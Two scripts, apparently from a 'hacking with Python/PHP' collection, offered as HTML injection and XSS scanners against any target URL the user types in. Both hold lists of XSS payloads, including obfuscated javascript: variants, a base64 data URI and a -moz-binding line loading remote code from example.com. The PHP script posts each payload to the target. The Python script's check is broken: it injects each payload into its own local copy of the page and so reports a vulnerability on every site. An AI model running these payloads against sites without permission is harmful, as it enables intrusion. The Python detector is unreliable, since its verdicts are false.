File: hacking_with_python/html_injection.py
import requests
from bs4 import BeautifulSoup
from colorama import Fore, Style

# List of common HTML injection payloads
payloads = [
    "<script>alert('XSS Vulnerability');</script>",
    "<img src=\"javascript:alert('XSS Vulnerability');\">",
    "<iframe src=\"javascript:alert('XSS Vulnerability');\"></iframe>",
    "<svg/onload=alert('XSS Vulnerability')>",
    "'\"<script>alert('XSS Vulnerability');</script>",
    "<BODY ONLOAD=alert('XSS Vulnerability')>",
    "<BODY BACKGROUND='javascript:alert('XSS Vulnerability')'>",
    "<IMG SRC='vbscript:msgbox('XSS Vulnerability')'>",
    "<LINK REL='stylesheet' HREF='javascript:alert('XSS Vulnerability')'>",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS Vulnerability');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS Vulnerability');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS Vulnerability');\">",
    "<IMG SRC=\"jav&#x0C;ascript:alert('XSS Vulnerability');\">",
    "<IMG SRC=\"jav&#x0B;ascript:alert('XSS Vulnerability');\">",
]

def test_html_injection(url, payloads):
    try:
        # Send a GET request to the specified URL
        response = requests.get(url)

        # Check if the response is successful (status code 200)
        if response.status_code == 200:
            # Parse the HTML content
            soup = BeautifulSoup(response.text, 'html.parser')

            # Check for each payload
            for payload in payloads:
                # Inject the payload into the response content
                injected_content = str(soup).replace("</body>", f"{payload}</body>")

                # Check if the payload appears in the injected content
                if payload in injected_content:
                    print(f"{Fore.RED}HTML Injection vulnerability detected with payload: {payload}{Style.RESET_ALL}")
                    print(f"{Fore.BLUE}Evidence:{Style.RESET_ALL}")
                    print(f"{Fore.GREEN}Before Injection:{Style.RESET_ALL}")
                    print(response.text)
                    print(f"{Fore.GREEN}After Injection:{Style.RESET_ALL}")
                    print(injected_content)
                    print("To test this vulnerability, try the following steps:")
                    print("1. Enter the payload into a form or input field on the website.")
                    print("2. Submit the form or input the data.")
                    print("3. Check if the payload is executed or appears as part of the page content.")
                    return
            print("No HTML Injection vulnerability detected.")
        else:
            print(f"Failed to retrieve content from {url}. Status code: {response.status_code}")
    except Exception as e:
        print(f"An error occurred: {str(e)}")

# Example usage:
if __name__ == "__main__":
    # Prompt the user to input the target website URL
    target_url = input("Enter your target website URL: ")

    # Test the HTML injection vulnerability with each payload
    test_html_injection(target_url, payloads)

File: hacking_with_php/html_injection.php
<?php
// Prompt user to enter the target website URL
echo "Enter your target website URL: ";
$target_url = trim(fgets(STDIN));

// Define an array of payloads to test
$payloads = array(
    "<script>alert('HTML Injection Vulnerability')</script>",
    "<img src='x' onerror='alert(\"HTML Injection Vulnerability\")'>",
    "<svg/onload=alert('HTML Injection Vulnerability')>",
    "<a href=\"javascript:alert('HTML Injection Vulnerability')\">Click Me</a>",
    "<iframe src=\"javascript:alert('HTML Injection Vulnerability')\"></iframe>",
    "<body onload=alert('HTML Injection Vulnerability')>",
    "<div onmouseover=alert('HTML Injection Vulnerability')>Hover Over Me</div>",
    "<svg><script>alert('HTML Injection Vulnerability')</script></svg>",
    "<img src=\"x\" onmouseover=alert('HTML Injection Vulnerability')>",
    "<a href=# onclick=alert('HTML Injection Vulnerability')>Click Me</a>",
    "<div style=\"background-image:url(javascript:alert('HTML Injection Vulnerability'))\">",
    "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgnSFRNTCBJbmplY3Rpb24gVmVyc2lvbjoxLjAnKTs8L3NjcmlwdD4=\">",
    "<marquee onstart=alert('HTML Injection Vulnerability')>Scroll Me</marquee>",
    "<form action=\"javascript:alert('HTML Injection Vulnerability')\"><input type=submit></form>",
    "<applet code=\"javascript:alert('HTML Injection Vulnerability')\"></applet>",
    "<div style=\"-moz-binding:url('https://example.com/xss.xml#xss')\">",
    "<input type=\"image\" src=\"x\" onerror=\"alert('HTML Injection Vulnerability')\">",
    // Add more payloads here as needed
);

// Define ANSI escape codes for colors
$red = "\033[31m"; // Red
$green = "\033[32m"; // Green
$reset = "\033[0m"; // Reset

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Iterate over payloads and test each one
foreach ($payloads as $payload) {
    // Construct the POST data with the payload
    $post_data = array(
        'input_field' => $payload
    );

    // Set the target URL and HTTP method
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

    // Execute cURL request
    $response = curl_exec($ch);

    // Check for any errors
    if (curl_errno($ch)) {
        echo $red . 'Error: ' . curl_error($ch) . $reset . "\n";
        continue;
    }

    // Analyze the response for indications of successful injection
    if (strpos($response, "HTML Injection Vulnerability") !== false) {
        echo $green . "HTML Injection Vulnerability detected with payload: $payload" . $reset . "\n";
    } else {
        echo $red . "No HTML Injection Vulnerability detected with payload: $payload" . $reset . "\n";
    }
}

// Close cURL session
curl_close($ch);
?>
